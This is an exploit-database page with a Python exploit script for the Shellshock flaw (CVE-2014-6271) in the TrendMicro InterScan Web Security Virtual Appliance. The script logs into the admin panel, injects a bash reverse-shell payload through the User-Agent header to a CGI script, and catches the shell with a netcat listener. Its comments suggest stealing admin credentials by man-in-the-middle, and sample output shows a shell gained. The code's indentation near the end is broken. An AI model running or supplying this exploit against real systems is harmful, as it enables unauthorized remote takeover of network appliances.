Lucene search

Hacker Fantastic1337DAY-ID-25954

HistoryOct 22, 2016 - 12:00 a.m.

TrendMicro InterScan Web Security Virtual Appliance - Remote Code Execution (Shellshock)

2016-10-2200:00:00

Hacker Fantastic

0day.today

0.976 High

EPSS

Percentile

100.0%

JSON

Exploit for hardware platform in category remote exploits

#!/usr/bin/env python
# TrendMicro InterScan Web Security Virtul Appliance
# ==================================================
# InterScan Web Security is a software virtual appliance that 
# dynamically protects against the ever-growing flood of web 
# threats at the Internet gateway exclusively designed to secure 
# you against traditional and emerging web threats at the Internet 
# gateway. The appliance however is shipped with a vulnerable
# version of Bash susceptible to shellshock (I know right?). An
# attacker can exploit this vulnerability by calling the CGI
# shellscript "/cgi-bin/cgiCmdNotify" which can be exploited
# to perform arbitrary code execution. A limitation of this 
# vulnerability is that the attacker must have credentials for
# the admin web interface to exploit this flaw. The panel runs
# over HTTP by default so a man-in-the-middle attack could be
# used to gain credentials and compromise the appliance.
# 
# $ python trendmicro_IWSVA_shellshock.py 192.168.56.101 admin password 192.168.56.1
# [+] TrendMicro InterScan Web Security Virtual Appliance CVE-2014-6271 exploit
# [-] Authenticating to '192.168.56.101' with 'admin' 'password'
# [-] JSESSIONID = DDE38E62757ADC00A51311F1F953EEBA
# [-] exploiting shellshock CVE-2014-6271...
# bash: no job control in this shell
# bash-4.1$ id
# uid=498(iscan) gid=499(iscan) groups=499(iscan)
# 
# -- Hacker Fantastic 
#
# (https://www.myhackerhouse.com)
import SimpleHTTPServer
import subprocess
import requests
import sys
import os
 
def spawn_listener():
    os.system("nc -l 8080")
 
def shellshock(ip,session,cbip):
    user_agent = {'User-agent': '() { :; }; /bin/bash -i >& /dev/tcp/'+cbip+'/8080 0>&1'}
    cookies = {'JSESSIONID': session}
    print "[-] exploiting shellshock CVE-2014-6271..."
    myreq = requests.get("http://"+ip+":1812/cgi-bin/cgiCmdNotify", headers = user_agent, cookies = cookies)
 
def login_http(ip,user,password):
    mydata = {'wherefrom':'','wronglogon':'no','uid':user, 'passwd':password,'pwd':'Log+On'}
    print "[-] Authenticating to '%s' with '%s' '%s'" % (ip,user,password)
    myreq = requests.post("http://"+ip+":1812/uilogonsubmit.jsp", data=mydata)  
    session_cookie = myreq.history[0].cookies.get('JSESSIONID')
    print "[-] JSESSIONID = %s" % session_cookie 
    return session_cookie
 
if __name__ == "__main__":
    print "[+] TrendMicro InterScan Web Security Virtual Appliance CVE-2014-6271 exploit"
    if len(sys.argv) < 5:
        print "[-] use with <ip> <user> <pass> <connectback_ip>"
        sys.exit()
    newRef=os.fork()
        if newRef==0:
        spawn_listener()
        else:
        session = login_http(sys.argv[1],sys.argv[2],sys.argv[3])
        shellshock(sys.argv[1],session,sys.argv[4])

#  0day.today [2018-03-16]  #